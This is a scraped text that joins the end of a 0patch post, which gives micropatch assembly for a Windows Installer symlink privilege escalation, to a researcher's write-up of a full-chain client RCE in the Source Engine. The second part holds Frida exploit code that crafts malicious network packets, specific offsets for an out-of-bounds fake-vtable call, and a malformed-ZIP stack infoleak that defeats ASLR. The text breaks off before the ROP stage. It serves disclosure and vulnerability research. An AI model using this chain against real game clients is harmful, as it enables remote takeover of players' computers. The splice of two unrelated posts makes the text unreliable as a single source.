Since attacker has limited control over the content of installer log file, and cannot modify the redirected log file after it has been created, Adrian had to be creative and found a working attack scenario in creating/overwriting PowerShell profile file (C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1) that gets loaded whenever anyone, ideally admin, uses PowerShell.

In essence, Microsoft's fix included a call to function IsAdmin from function CreateLog, which is in charge of creating installer log file. Some permissions checking was already in place before in this function but was not resilient to the "bait-and-switch" symbolic link trick that has been successful against many Windows products before, and will surely be successful against many more to come.

Our micropatch does logically the same as Microsoft's fix. Here is its source code for 64-bit Windows 7 and Server 2008 R2 with its 7 CPU instructions.



MODULE_PATH "..\Affected_Modules\msi.dll_5.0.7601.24535_64bit\msi.dll"
PATCH_ID 604
PATCH_FORMAT_VER 2
VULN_ID 7058
PLATFORM win64

patchlet_start
 PATCHLET_ID 1
 PATCHLET_TYPE 2
 PATCHLET_OFFSET 0xf5a55               ; First GetCurrentThread block in CreateLog function
                                       ; instruction lea r9, [rsp+98h+TokenHandle]
    N_ORIGINALBYTES 5
    JUMPOVERBYTES 0
    PIT msi.dll!0xf5b31,msi.dll!0xef7f8   ; Address of block to jump to; IsAdmin function
    
    code_start
        push rax                      ;Save the GetCurrentThread return
        push rax                      ;Push one more time to fix stack alignment
        call PIT_0xef7f8              ;Call IsAdmin (ret 1 if admin, 0 if not)
        cmp rax, 0                    ;Check if user is admin
        pop rax                       ;Restore the GetCurrentThread return and fix stack alignment again
        pop rax
        je PIT_0xf5b31                ;If user is not an admin, jump over the scond createfile block
    code_end
    
patchlet_end

 

See the micropatch in action here:




We'd like to thank Adrian Denkiewicz for sharing their analysis and POC, which allowed us to create this micropatch for Windows users without official security updates. We also encourage security researchers to privately share their analyses with us for micropatching.

This micropatch is immediately available to all 0patch users with a PRO license, and is already downloaded and applied on all online 0patch-protected Windows 7 and Windows Server 2008 R2 machines without Extended Security Updates, or with year 1 of Extended Security Updates.

To obtain the micropatch and have it applied on your computer(s) along with other micropatches included with a PRO license, create an account in 0patch Central, install 0patch Agent and register it to your account. Note that no computer restart is needed for installing the agent or applying/un-applying any 0patch micropatch. 

And don't forget, if your organization has Windows 7 or Server 2008 R2 machines with Extended Security Updates and wouldn't mind saving lots of money on less expensive low-risk security patches in 2021 that don't even need your machines to be restarted, contact [email protected].

To learn more about 0patch, please visit our Help Center



 

 

 

 

 

 

 

 

 

Exploiting the Source Engine (Part 2) - Full-Chain Client RCE in Source using Frida

Introduction

Hey guys, it’s been awhile. I have cool new information to share now that my bug bounty has finally gone through. This recent report contained a full server-to-client RCE chain which I’m proud of. Unlike my first submission, it links together two separate bugs to achieve code execution, one memory corruption and one infoleak, and was exploitable in all Source Engine 1 titles including TF2, CS:GO, L4D:2 (no game specific functionality required!). In this bug hunting adventure, I wanted to spice things up a bit, so I added some extra constraints to the bugs I found/used, as well as experimented using the Frida framework as a way to interface with the engine through Typescript.

Problems with SourceMod (since the last post)

If you read my last blog post, you knew that I was using SourceMod as a way to script up my local dedicated server to test bugs I found for validity. While auditing this time around, it was quickly apparent that most of the obvious bugs in any of the original Source 2013 codebases were patched already. But, without confirming the bugs as fixed myself, I couldn’t rule out their validity, so a lot of my initial time was just spent scripting up SourceMod scripts and testing. While SourceMod itself already has a pretty fleshed-out scripting environment, it still used the SourcePawn language, which is a bit outdated compared to modern scripting languages. In addition, adding any functionality that wasn’t already in SourceMod required you to compile C++ plugins using their plugin API, which was sometimes tedious to work with. While SourceMod was very functional overall, I wanted to find something better. That’s why I decided to try out Frida after hearing good things from friends who worked in the mobile space.

Frida? On Windows?

One of the goals of this bug hunt was to try out Frida for testing PoCs and productizing the exploit. You might have heard about the Frida project before in the mobile hacking community where it really shines, but you might not have heard about it being used for exploiting desktop applications, especially on Windows! (did you know Frida fully supports Windows?)

Getting started with Frida was actually quite simple, because the architecture is simple. In Frida, you have a “client” and a “server”. The “client” (typically Python) selects a process to inject into, in this case hl2.exe, and injects the “server” (known as a Gadget) that will talk back and forth with the “client”. The “server”, executing inside the game, creates a rich Javascript environment with special bindings to read/write memory and hook code. To know more about how this works, check out the Frida Docs.

After getting that simple client and server set up for Frida, I created a Typescript library which allowed me to interface with the Source Engine more easily. Those familiar with game engines know that very often the engine objects take advantage of C++ polymorphism which expose their functionality through virtual functions. So, in order to work with these objects from Frida, I had to write some vtable wrapper helpers that allowed me to convert native pointer values into actual Typescript objects to call functions on.

An example of what these wrappers look like:

// Create a pointer to the IVEngineClient interface by calling CreateInterface exported by engine.dll
let client = IVEngineClient.CreateInterface()
log(`IVEngineClient: ${client.pointer}`)

// Call the vtable function to get the local client's net channel instance
let netchan = client.GetNetChannelInfo() as CNetChan
if (netchan.pointer.isNull()) {
    log(`Couldn't get NetChan.`)
    return;
}

Pretty slick! These wrappers helped me script up low-level C++ functionality with a handy little scripting interface.

The best part of Frida is really its hooking interface, Interceptor. You can hook native functions directly from within Frida, and it handles the entire process of running the Typescript hooks and marshalling arguments to and from the JS engine. This is the primary way you use Frida to introspect, and it worked great for hooking parts of the engine just to see the values of arguments and return values while executing normally.

I quickly learned that the Source engine tooling I had made could also be injected into both a client (hl2.exe) and a server (srcds.exe) at the same time, without any real modification. Therefore, I could write a single PoC that instrumented both the client and server to prove the bug. The server would generate and send some network packets and the client would be hooked to see how it accepted the input. This dual-scripting environment allowed me to instrument practically all of the logic and communication I needed to ensure the prospective bugs I discovered were fully functional and unpatched.

Lastly, I decided to create a fairly novel Frida extension module that utilized the ret-sync project to communicate with a loaded copy of IDA at runtime. What this let me do is assign names to functions inside of my IDA database and have Frida reach out through the ret-sync protocol to my IDA instance to get their address. The intent was to make the exploit scripts much more stable between game binary updates (which happen every few days for games like CS:GO).

Here’s an example of hooking a function by IDA symbol using my ret-sync extension. The script dynamically asks my IDA instance where CGameClient::ProcessSignonStateMsg exists inside engine.dll the current process, hooks it, and then does some functionality with some engine objects:

// Hook when new clients are connecting and wait for them to spawn in to begin exploiting them. 
// This function is called every time a client transitions from one state to the next 
//     while loading into the server.
let signonstate_fn = se.util.require_symbol("CGameClient::ProcessSignonStateMsg")
Interceptor.attach(signonstate_fn, {
    onEnter(args) {
        console.log("Signon state: " + args[0].toInt32())

        // Check to make sure they're fully spawned in
        let stateNumber = args[0].toInt32()
        if (stateNumber != SIGNONSTATE_FULL) { return; }

        // Give their client a bit of time to load in, if it's slow.
        Thread.sleep(1)

        // Get the CGameClient instance, then get their netchannel
        let thisptr = (this.context as Ia32CpuContext).ecx;
        let asNetChan = new CGameClient(thisptr.add(0x4)).GetNetChannel() as CNetChan;
        if (asNetChan.pointer.isNull()) {
            console.log("[!] Could not get CNetChan for player!")
            return;
        }
        [...]
    }
})

Now, if the game updates, this script will still function so long as I have an IDA database for engine.dll open with CGameClient::ProcessSignonStateMsg named inside of it. The named symbols can be ported over between engine updates using BinDiff automagically, making it easy to automatically port offsets as the game updates!

All in all, my experience with Frida was awesome and its extensibility was wonderful. I plan to use Frida for all sorts of exploitation and VR activities to follow, and will continue to use it with any more Source adventures in the foreseeable future. I encourage readers with backgrounds with pwntools and CTFing to consider trying out Frida against desktop binaries. I gained a lot from learning it, and I feel like the desktop reversing/VR/exploitation community should really look to adopt it as much as the mobile community has!

Okay, enough about Frida. Talk about Source bugs!

There’s a lot of bugs in Source. It’s a very buggy engine. But not all bugs are made equal, and only some bugs are worth attempting to chain together. The easy type of bug to exploit in the engine is the basic stack-based buffer overflow. If you read my last blog post, you saw that Source typically compiles without any stack protections against buffer overflows. Therefore, it’s trivial to gain control of the instruction pointer and begin ROP-ing for as long as you have a silly string bug affecting the stack.

In CS:GO, the classic method of exploiting these type of bugs is to exploit some buffer overflow, build a ROP using the module xinput.dll which has ASLR marked as disabled, and execute shellcode on that alone. In Windows, DLLs can essentially mark themselves as not being subject to ASLR. Typically you will only find these on DLLs compiled with ancient versions of the MSVC compiler toolchain, which I believe is the case with xinput.dll. This doesn’t mean that the module cannot be relocated to a new address. In fact, xinput.dll can actually be relocated to other addresses just fine, and sometimes can be found at different addresses depending on if another module’s load conflicts with the address xinput.dll asks to be loaded at. Basically this means that, due to the way xinput.dll asks to be loaded, the system will choose not to randomize its base address, making it inherently defeat ASLR as you always know generally where xinput.dll is going to be found in your victim’s memory. You can write one static ROP chain and use it unmodified on every client you wish to exploit.

In addition, since xinput.dll is always loaded into the games which use it, it is by far the easiest form of ASLR defeat in the engine. Valve doesn’t seem to concerned by this, as its been exploited over and over again over the years. Surprisingly though, in TF2, there is no xinput.dll to utilize for ASLR defeat. This actually makes TF2, which runs on the older Source engine version, significantly harder to exploit than CS:GO, their flagship game, because TF2 requires a pointer leak to defeat ASLR. Not a great design choice I feel.

In the case of a server->client exploit, one of these exploits would typically look like:

  • Client connects to server
  • Server exploits stack-based buffer overflow in the client
  • Bug overwrites the stack with a ROP chain written against xinput and overwrites into the instruction pointer (no stack cookie)
  • Client begins executing gadgets inside of xinput to set up a call to ShellExecuteA or VirtualAlloc/VirtualProtect.
  • Client is running arbitrary code

If this reminds you of early 2000s era exploitation, you are correct. This is generally the level of difficulty one would find in entry level exploitation problems in CTF.

What if my target doesn’t have xinput.dll to defeat ASLR?

One would think: “Well, the engine is buggy already, that means that you can just find another infoleak bug and be done!” But it doesn’t quite work that way in practice. As others who participate in the program have found, finding an information leak is actually quite difficult. This is just due to the general architecture of the networking of the engine, which rarely relies on any kind of buffer copy operations. Packets in the engine are very small and don’t often have length values that are controlled by the other side of the connection. In addition, most larger buffers are allocated on the heap instead of the stack. Source uses a custom heap allocator, as most game engines do, and all heap allocations are implicitly zeroed before being given back to the caller, unlike your typical system malloc implementation. Any uninitialized heap memory is unfortunately not a valid target for an infoleak.

An option to getting around this information leak constraint is to focus on finding bugs which allow you to leverage the corruption itself to leak information. This is generally the path I would suggest for anyone looking to exploit the engine in games without xinput.dll, as finding the typical vanilla infoleak is much more difficult than finding good corruption and exploiting that alone to leak information.

Types of bugs that tend to be good for this kind of “all-in-one” corruption are:

  • Arbitrary relative pointer writes to pointers in global queryable objects
  • Heap overflows against a queryable object to cause controllable pointer writes
  • Use-after-free with a queryable object

Heap exploits are cool to write, but often their stability can be difficult to achieve due to the vast number of heap allocations happening at any given time. This makes carving out areas of heap memory for your exploit require careful consideration for specifically sized holes of memory and the timing at which these holes are made. This process is lovingly referred to as Heap Feng Shui. In this post, I do not go over how to exploit heap vulnerabilities on the Source engine, but I will note that, due to its custom allocator, the allocations are much more predictable than the default Windows 10 heap, which is a nice benefit for those looking to do heap corruption.

Also, notice the word queryable above. This means that, whatever you corrupt for your information leak, you need to ensure that it can be queried over the network. Very few types of game objects can be queried arbitrarily. The best type of queryable object to work with in Source is the ConVar object, which represents a configurable console variable. Both the client and server can send requests to query the value of any ConVar object. The string that is sent back is the value of either the integer value of the CVar, or an arbitrary-length string value.

Bug Hunting - Struggling is fun!

This time around, I gave myself a few constraints to make the exploit process a bit more challenging, and therefore more fun:

  • The exploit must be memory corruption and must not be a trivial stack-based buffer overflow
  • The exploit must produce its own pointer leak, or chain another bug to infoleak
  • The exploit must work in all Source 1 games (TF2, CS:GO, L4D:2, etc.) and not require any special configuration of the client
  • The exploit must have a ~100% stability rate
  • The exploit must be written using Frida, and must be “one-click” automatically exploited on any client connected to the server

Given these constraints, I ruled out quite a few bugs. Most of these were because they were trivial stack-based buffer overflows, or present in only one game but not the other.

Here’s what I eventually settled on for my chain:

  • Memory Corruption - An array index under/overflow that allowed for one-shot arbitrary execute of an address in the low-level networking code
  • Information Leak - A stack-based information leak in file transfers that leveraged a “bug” in the ZIP file parser for the map file format (BSP)

I would say the general length of time to discover the memory corruption was about 1/10th of the time I spent finding the information leak. I spent around two months auditing code for information leaks, whereas the memory corruption bug became quickly obvious within a few days of auditing the networking code.

Memory Corruption - Arbitrary execute with CL_CopyExistingEntity

The vulnerability I used for memory corruption was the array index over/under-flow in the low-level networking function CL_CopyExistingEntity. This is a function called within the packet handler for the server->client packet named SVC_PacketEntities. In Source, the way data about changes to game objects is communicated is through the “delta” system. The server calculates what values have changed about an entity between two points in time and sends that information to your client in the form of a “delta”. This function is responsible for copying any changed variables of an existing game object from the network packet received from the server into the values stored on the client. I would consider this a very core part of the Source networking, which means that it exists across the board for all Source games. I have not verified it exists in older GoldSrc games, but I would not be surprised, considering this code and vulnerability are ancient and have existed for 15+ years untouched.

The function looks like so:

void CL_CopyExistingEntity( CEntityReadInfo &u )
{
    int start_bit = u.m_pBuf->GetNumBitsRead();

    IClientNetworkable *pEnt = entitylist->GetClientNetworkable( u.m_nNewEntity );
    if ( !pEnt )
    {
        Host_Error( "CL_CopyExistingEntity: missing client entity %d.\n", u.m_nNewEntity );
        return;
    }

    Assert( u.m_pFrom->transmit_entity.Get(u.m_nNewEntity) );

    // Read raw data from the network stream
    pEnt->PreDataUpdate( DATA_UPDATE_DATATABLE_CHANGED );

u.m_nNewEntity is controlled arbitrarily by the network packet, therefore this first argument to GetClientNetworkable can be an arbitrary 32-bit value. Now let’s look at GetClientNetworkable:

IClientNetworkable* CClientEntityList::GetClientNetworkable( int entnum )
{
	Assert( entnum >= 0 );
	Assert( entnum < MAX_EDICTS );
	return m_EntityCacheInfo[entnum].m_pNetworkable;
}

As we see here, these Assert statements would typically check to make sure that this value is sane, and crash the game if they weren’t. But, this is not what happens in practice. In release builds of the game, all Assert statements are not compiled into the game. This is for performance reasons, as the #1 goal of any game engine programmer is speed first, everything else second.

Anyway, these Assert statements do not prevent us from controlling entnum arbitrarily. m_EntityCacheInfo exists inside of a globally defined structure entitylist inside of client.dll. This object holds the client’s central store of all data related to game entities. This means that m_EntityCacheInfo since is at a static global offset, this allows us to calculate the proper values of entnum for our exploit easily by locating the offset of m_EntityCacheInfo in any given version of client.dll and calculating a proper value of entnum to create our target pointer.

Here is what an object inside of m_EntityCacheInfo looks like:

// Cached info for networked entities.
// NOTE: Changing this changes the interface between engine & client
struct EntityCacheInfo_t
{
	// Cached off because GetClientNetworkable is called a *lot*
	IClientNetworkable *m_pNetworkable;
	unsigned short m_BaseEntitiesIndex;	// Index into m_BaseEntities (or m_BaseEntities.InvalidIndex() if none).
	unsigned short m_bDormant;	// cached dormant state - this is only a bit
};

All together, this vulnerability allows us to return an arbitrary IClientNetworkable* from GetClientNetworkable as long as it is aligned to an 8 byte boundary (as sizeof(m_EntityCacheInfo) == 8). This is important for finding future exploit chaining.

Lastly, the result of returning an arbitrary IClientNetworkable* is that there is immediately this function call on our controlled pEnt pointer:

pEnt->PreDataUpdate( DATA_UPDATE_DATATABLE_CHANGED );

This is a virtual function call. This means that the generated code will offset into pEnt’s vtable and call a function. This looks like so in IDA:

image-20200507164606006

Notice call dword ptr [eax+24]. This implies that the vtable index is at 24 / 4 = 6, which is also important to know for future exploitation.

And that’s it, we have our first bug. This will allow us to control, within reason, the location of a fake object in the client to later craft into an arbitrary execute. But how are we going to create a fake object at a known location such that we can convince CL_CopyExistingEntity to call the address of our choice? Well, we can take advantage of the fact that the server can set any arbitrary value to a ConVar on a client, and most ConVar objects exist in globals defined inside of client.dll.

The definition of ConVar is:

class ConVar : public ConCommandBase, public IConVar

Where the general structure of a ConVar looks like:

ConCommandBase *m_pNext; [0x00]
bool m_bRegistered; [0x04]
const cha *m_pszName; [0x08]
const char *m_pszHelpString; [0x0C]
int m_nFlags; [0x10]
ConVar *m_pParent; [0x14]
const char *m_pszDefaultValue; [0x18]
char *m_pszString; [0x1C]

In this bug, we’re targeting m_pszString so that our crafted pointer lands directly on m_pszString. When the bug calls our function, it will believe that &m_pszString is the location of the object’s pointer, and m_pszString will contain its vtable pointer. The engine will now believe that any value inside of m_pszString for the ConVar will be part of the object’s structure. Then, it will call a function pointer at *((*m_pszString)+0x1C). As long as the ConVar on the client is marked as FCVAR_REPLICATED, the server can set its value arbitrarily, giving us full control over the contents of m_pszString. If we point the vtable pointer to the right place, this will give us control over the instruction pointer!

m_pszString is at offset 0x1C in the above ConVar structure, but the terms of our vulnerability requires that this pointer be aligned to an 8 byte boundary. Therefore, we need to find a suitable candidate ConVar that is both globally defined and replicated so that we can align m_pszString to correctly to return it to GetClientNetworkable.

This can be seen by what GetClientNetworkable looks like in x64dbg:

image-20200507170851575

In the above, the pointer we can return is controlled as such:

ecx+eax*8+28 where ecx is entitylist, eax is controlled by us

With a bit of searching, I found that the ConVar sv_mumble_positionalaudio exists in client.dll and is replicated. Here it exists at 0x10C6B788 in client.dll:

image-20200507173708203

This means to calculate the value of m_pszString, we add 0x1A to get 0x10C6B788 + 0x1C = 0x10C6b7A4. In this build, entitylist is at an aligned offset of 4 (0xC580B4). So, now we can calculate if this candidate is aligned properly:

>>> 0x10c6b7a4 % 0x8
4

This might look wrong, but entitylist is actually aligned to a 0x04 boundary, so that will add an extra 0x04 to the above alignment, making this value successfully align to 0x08!

Now we’re good to go ahead and use the m_pszString value of sv_mumble_positionalaudio to fake our object’s vtable pointer by using the server to control the string data contents through ConVar replication.

In summary, this is the path the code above will take:

  • Call GetClientNetworkable to get pEnt, which we will fake to point to &m_pszString.
  • The code dereferences the first value inside of m_pszString to get the pointer to the vtable
  • The code offsets the vtable to index 6 and calls the first function there. We need to make sure we point this to a place we control, otherwise we would only be controlling the vtable pointer and not the actual function address in the table.

But where are we going to point the vtable? Well, we don’t need much, just a location of a known place the server can control so we can write an address we want to execute. I did some searching and came across this:

bool NET_Tick::ReadFromBuffer( bf_read &buffer )
{
	VPROF( "NET_Tick::ReadFromBuffer" );

	m_nTick = buffer.ReadLong();
#if PROTOCOL_VERSION > 10
	m_flHostFrameTime = (float)buffer.ReadUBitLong( 16 ) / NET_TICK_SCALEUP;
	m_flHostFrameTimeStdDeviation = (float)buffer.ReadUBitLong( 16 ) / NET_TICK_SCALEUP;
#endif
	return !buffer.IsOverflowed();
}

As you might see, m_nTick is controlled by the contents of the NET_Tick packet directly. This means we can assign this to an arbitrary 32-bit value. It just so happens that this value is stored at a global as well! After some scripting up in Frida, I confirmed that this is indeed completely controllable by the NET_Tick packet from the server:

image-20200513141444074

The code to send this packet with my Frida bindings is quite simple too:

function SetClientTick(bf: bf_write, value: NativePointer) {
    bf.WriteUBitLong(net_Tick, NETMSG_BITS)

    // Tick count (Stored in m_ClientGlobalVariables->tickcount)
    bf.WriteLong(value.toInt32())

    // Write m_flHostFrameTime -> 1
    bf.WriteUBitLong(1, 16);

    // Write m_flHostFrameTimeStdDeviation -> 1
    bf.WriteUBitLong(1, 16);
}

Now we have a candidate location to point our vtable pointer. We just have to point it at &tickcount - 24 and the engine will believe that tickcount is the function that should be called in the vtable. After a bit of testing, here’s the resulting script which creates and sends the SVC_PacketEntities packet to the client to trigger the exploit:

// craft the netmessage for the PacketEntities exploit
function SendExploit_PacketEntities(bf: bf_write, offset: number) {
    bf.WriteUBitLong(svc_PacketEntities, NETMSG_BITS)

    // Max entries
    bf.WriteUBitLong(0, 11)

    // Is Delta?
    bf.WriteBit(0)

    // Baseline?
    bf.WriteBit(0)

    // # of updated entries?
    bf.WriteUBitLong(1, 11)

    // Length of update packet?
    bf.WriteUBitLong(55, 20)

    // Update baseline?
    bf.WriteBit(0)

    // Data_in after here
    bf.WriteUBitLong(3, 2) // our data_in is of type 32-bit integer

    // >>>>>>>>>>>>>>>>>>>> The out of bounds type confusion is here <<<<<<<<<<<<<<<<<<<<
    bf.WriteUBitLong(offset, 32)

    // enterpvs flag
    bf.WriteBit(0)

    // zero for the rest of the packet
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
}

Now we’ve got the following modified chain:

  • Call GetClientNetworkable to get pEnt, which we will fake to point to &m_pszString.
  • The code dereferences the first value inside of m_pszString to get the pointer to the vtable. We point this at &tickcount - 6*4 which we control.
  • The code offsets the vtable to index 6, dereferences, and calls the “function”, which will be the value we put in tickcount.

This generally looks like this in the exploit script:

// The fake object pointer and the ROP chain are stored in this cvar
ReplicateCVar(pkts_to_send, "sv_mumble_positionalaudio", tickCountAddress)

// Set a known location inside of engine.dll so we can use it to point our vtable value to
SetClientTick(pkts_to_send, new NativePointer(0x41414141))

// Then use exploit in PacketEntities to fake the object pointer to point to sv_mumble_positionalaudio's string value
SendExploit_PacketEntities(pkts_to_send, 0x26DA) 

0x26DA was calculated above to be the necessary entnum value to cause the out-of-bounds and align us to sv_mumble_positionalaudio->m_pszString.

Finally, we can see the results of our efforts:

image-20200513142919977

As we can see here, 0x41414141 is being popped off the stack at the ret, giving us a one-shot arbitrary execute! What you can’t see here is that, further down on the stack, our entire packet is sitting there unchanged, giving us ample room for a ROP chain.

Now, all we need is a pivot, which can be easily found using the Ropper project. After finding an appropriate pivot, we now can begin crafting a ROP chain… except we are missing something important. We don’t know where any gadgets are located in memory, including our stack pivot! Up until now, everything we’ve done is with relative offsets, but now we don’t even know where to point the value of 0x41414141 to on the client, because the layout of the code is randomized by ASLR. The easy way out would be to load up CS:GO and use xinput.dll addresses for our ROP chain… but that would violate my arbitrary constraint that this exploit must work for all Source games.

This means we need to go infoleak hunting.

Leaking uninitialized stack memory using a tricky ZIP file bug

After auditing the engine for many days over the course of a few months, I was finally able to engineer a series of tricks to chain together to cause the engine to leak uninitialized stack memory. This was all-in-all significantly harder than the memory corruption, and required a lot of out-of-the-box thinking to get it to work. This was my favorite part of the exploit. Here’s some background on how some of these systems work inside the engine and how they can be chained together:

  • Servers can cause the client to upload arbitrary files with certain file extensions
  • Map files can contain an embedded ZIP file which can package additional textures/files. This is called a “pakfile”.
  • When the map has a pakfile, the engine adds the zip file as sort of a “virtual overlay” on the regular filesystem the game uses to read/write files. This means that, in any file accesses the game makes, it will check the map’s pakfile to see if it can read it from there.

The interesting behavior I discovered about this system is that, if the server requests a file that is inside of the map’s pakfile, the client will upload that file from the embedded ZIP to the server. This wouldn’t make any sense in a normal case, but what it does is create a very unintended attack surface.

Now, let’s take a look at the function which is responsible for determining how large the file is that is going to be uploaded to the server, and if it is too large to be sent:

int totalBytes = g_pFileSystem->Size( filename, pPathID );

if ( totalBytes >= (net_maxfilesize.GetInt()*1024*1024) )
{
    ConMsg( "CreateFragmentsFromFile: '%s' size exceeds net_maxfilesize limit (%i MB).\n", filename, net_maxfilesize.GetInt() );
    return false;
}

So, what happens inside of g_pFileSystem->Size when you point it to a file inside the pakfile? Well, the code reads the ZIP file structure and locates the file, then reads the size directly from the ZIP header:

image-20200430014752750

Notice: lookup.m_nLength = zipFileHeader.uncompressedSize

Now we fully control the contents of the map file we gave to the client when they loaded in. Therefore, we control all the contents of the embedded pakfile inside the map. This means we control the full 32-bit value returned by g_pFileSystem->Size( filename, pPathID );.

So, maybe you have noticed where we’re going. int totalBytes is a signed integer, and the comparison for whether a file is too large is determined by a signed comparison. What happens when totalBytes is negative? That makes it fully pass the length check.

If we are able to hack a file into the ZIP structure with a negative length, the engine will now happily upload to the server.

Let’s look at the function responsible for reading the file to be uploaded to the server.

Inside of CNetChan::SendSubChannelData:

g_pFileSystem->Seek( data->file, offset, FILESYSTEM_SEEK_HEAD );
g_pFileSystem->Read( tmpbuf, length, data->file );
buf.WriteBytes( tmpbuf, length );

A stack buffer of size 0x100 is used to read contents of the file in 0x100 sized chunks as the file is sent to the server. It does so by calling g_pFileSystem->Read() on the file pointer and reading out the data to a temporary buffer on stack. The subchannel believes this file to be very large (as the subchannel interprets the size as an unsigned integer). The networking code will indefinitely send chunks to the server by allocating 0x100 of stack space and calling ->Read(). But, when the file pointer reaches the end of the pakfile, the calls to ->Read() stop writing out any data to the stack as there is no data left to read. Rather than failing out of this function, the return value of ->Read() is ignored and the data is sent Anyway. Because the stack’s contents are not cleared with each iteration, 0x100 bytes of uninitialized stack data are sent to the server constantly. The client’s subchannel will continue to send fragments indefinitely as the “file size” is too large to ever be sent successfully.

After quite a bit of learning about how the PKZIP file structure works, I was able to write up this Python script which can take an existing BSP and hack in a negatively sized file into the pakfile. Here’s the result:

image-20200506163703366

Now, we can test it by loading up Frida and crafting a packet to request the hacked file be uploaded to the server from the pakfile. Then, we can enable net_showfragments 1 in the game’s console to see all of the fragments that are being sent to us:

image-20200506171807825

This shows us that the client is sending many file fragments (num = 1 means file fragment). When left running, it will not stop re-leaking that stack memory to us, and will just continue to do so infinitely as long as the client is connected. This happens slowly over time, so the client’s game is unaffected.

I also placed a Frida Interceptor hook on the function responsible for reading the file’s size, and here we can see that it is indeed returning a negative number:

image-20200506164957309

Lastly, I hooked the function responsible for processing incoming file fragment packets on the server, and lo and behold, I have this blob of data being sent to us:

           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  50 4b 05 06 00 00 00 00 06 00 06 00 f0 01 00 00  PK..............
00000010  86 62 00 00 20 00 58 5a 50 31 20 30 00 00 00 00  .b.. .XZP1 0....
00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000030  00 00 00 00 00 00 fa 58 13 00 00 58 13 00 00 26  .......X...X...&
00000040  00 00 00 00 00 00 00 00 00 00 00 00 00 19 3b 00  ..............;.
00000050  00 6d 61 74 65 72 69 61 f0 5e 65 62 30 2e b9 05  .materia.^eb0...
00000060  60 55 65 62 9c 76 71 00 ce 92 61 62 f0 5e 65 62  `Ueb.vq...ab.^eb
00000070  08 0b b9 05 b8 00 7c 6d 30 2e b9 05 b9 00 7c 6d  ......|m0.....|m
00000080  f0 5e 65 62 f0 5e 65 62 f0 89 61 62 f0 5e 65 62  .^eb.^eb..ab.^eb
00000090  44 00 00 00 60 55 65 62 60 55 65 62 00 00 00 00  D...`Ueb`Ueb....
000000a0  00 b5 4e 00 00 6d 61 74 65 72 69 61 6c 73 2f 6d  ..N..materials/m
000000b0  61 70 73 2f 63 70 5f 63 ec 76 71 00 00 02 00 00  aps/cp_c.vq.....
000000c0  0a a4 bc 7b 30 2e b9 05 f0 70 88 68 40 00 00 00  ...{[email protected]
000000d0  00 a5 db 09 01 00 00 00 c4 dc 75 00 16 00 00 00  ..........u.....
000000e0  00 00 00 00 98 77 71 00 00 00 00 00 00 00 00 00  .....wq.........
000000f0  30 77 71 00 cb 27 b3 7b 00 03 00 00 97 27 b3 7b  0wq..'.{.....'.{

You might not be able to tell, but this data is uninitialized. Specifically, there are pointer values that begin with 0x7B or 0x7C littered in here:

  • 97 27 b3 7b
  • 0a a4 bc 7b
  • 05 b9 00 7c
  • 05 b8 00 7c

The offsets of these pointer values in the 0x100 byte buffer are not always at the same place. Some heuristics definitely go a long way here. A simple mapping of DWORD values inside the buffer over time can show that some values quickly look like pointers and some do not. After a bit of tinkering with this leak, I was able to get it controlled to leak a known pointer value with ~100% certainty.

Here’s what the final output of the exploit looked like against a typical user:

[*] Intercepting ReadBytes (frag = 0)
0x0: 0x14b5041
0x4: 0x14001402
0x8: 0x0
0xc: 0x0
0x10: 0xd99e8b00
0x14: 0xffff00d3
0x18: 0xffff00ff
0x1c: 0x8ff
0x20: 0x0
0x24: 0x0
0x28: 0x18000
0x2c: 0x74000000
0x30: 0x2e747365
0x34: 0x50747874
0x38: 0x6054b
0x3c: 0x1000000
0x40: 0x36000100
0x44: 0x27000000
[...]
0xcc: 0xafdd68
0xd0: 0xa097d0c
0xd4: 0xa097d00
0xd8: 0xab780c
0xdc: 0x4
0xe0: 0xab7778
0xe4: 0x7ac9ab8d
0xe8: 0x0
0xec: 0x80
0xf0: 0xab7804
0xf4: 0xafdd68
0xf8: 0xab77d4
0xfc: 0x0
[*] leakedPointer: 0x7ac9ab8d
[*] Engine_Leak2 offset: 0x23ab8d
[*] leakedBase: 0x7aa60000

Only one of these values had a lower WORD offset that made sense (0xE4) therefore it was easily selectable from the list of DWORDS. After leaking this pointer, I traced it back in IDA to a return location for the upper stack frame of this function, which makes total sense. I gave it a label Engine_Leak2 in IDA, which could be loaded directly from my ret-sync connection to dynamically calculate the proper base address of the engine.dll module:

// calculate the engine base based on the RE'd address we know from the leak
static convertLeakToEngineBase(leakedPointer: NativePointer) {
    console.log("[*] leakedPointer: " + leakedPointer)

    // get the known offset of the leaked pointer in our engine.dll
    let knownOffset = se.util.require_offset("Engine_Leak2");
    console.log("[*] Engine_Leak2 offset: " + knownOffset)

    // use the offset to find the base of the client's engine.dll
    let leakedBase = leakedPointer.sub(knownOffset);
    console.log("[*] leakedBase: " + leakedBase)

    if ((leakedBase.toInt32() & 0xFFFF) !== 0) {
        console.log("[!] Failed leak...")
        return null;
    }

    console.log("[*] Got it!")
    return leakedBase;
}

The Final Chain + RCE!

After successfully developing the infoleak, now we have both a pointer leak and an arbitrary execute bug. These two are sufficient enough for us to craft a ROP chain and pop that sweet sweet calculator. The nice part about Frida being a Python module at its core is that you can use pyinstaller to turn any Frida script into an all-in-one executable. That way, all you have to do is copy the .exe onto a server, run your Source dedicated server, and launch the .exe to arm the server for exploitation.

Anyway, here is the full step-by-step detail of chaining the two bugs together:

  1. Player joins the exploitation server. This is picked up by the PoC script and it begins to exploit the client.

  2. Player downloads the map file from the server. The map file is specially prepared to install test.txt into the GAME filesystem path with the compromised length

  3. The server executes RequestFile to request the test.txt file from the pakfile. The client builds fragments for the new file and begins sending 0x100 sized fragments to the server, leaking stack contents. Inside the stack contents is a leaked stack frame return address from a previous call to bf_read::ReadBytes. By doing some calculations on the server, this achieves a full ASLR protection bypass on the client.

  4. The malicious server calculates the base of engine.dll on the client instance using the leaked pointer. This allows the server to now build a pointer value in the exploit payload to anywhere within engine.dll. Without this infoleak bug, the payload could not be built because the attacker does not know the location of any module due to ASLR.

